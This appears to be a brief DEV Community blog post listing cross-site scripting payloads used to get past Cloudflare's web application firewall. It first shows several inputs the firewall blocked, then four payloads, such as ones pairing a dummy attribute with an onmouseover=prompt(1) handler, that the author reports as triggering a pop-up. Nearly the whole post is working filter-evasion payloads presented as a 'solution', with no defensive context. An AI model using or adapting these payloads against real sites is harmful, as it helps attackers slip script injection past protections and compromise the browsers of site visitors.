DEV Community

loading...

XSS BYPASS HARD CLOUDFLARE WAF SOLUTION

Hafiz Muhammad Attaullah
I am studying for a Bachelors in Telecommunications in the Faculty of Engineering & Technology at the University of Sindh. I expect to graduate in Spring, 2021.
・1 min read

Problems

Input : "//ONX=""//ONFOCUS=prompt()>
Respond : Blocked

Input : "%01onfocus=test>
Respond : blocked

Input : "%2501onfocus=>
Respond : blocked

Input : "test=[1].map(confirm)>
Respond : blocked

Input : "test=[1].map%26%2300000000000040;1)>
Respond : Blocked

.
.

Solutions :

Input : "onx=() onmouseover=prompt(1)>
Respond : pop up appears

Input : " onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>
Respond : pop up appears

Input : "onx={} onmouseover=prompt(1)>
Respons : pop up appears

Input : "onx=[] onmouseover=prompt(1)>
Respond : pop up appears

Etc

Discussion (0)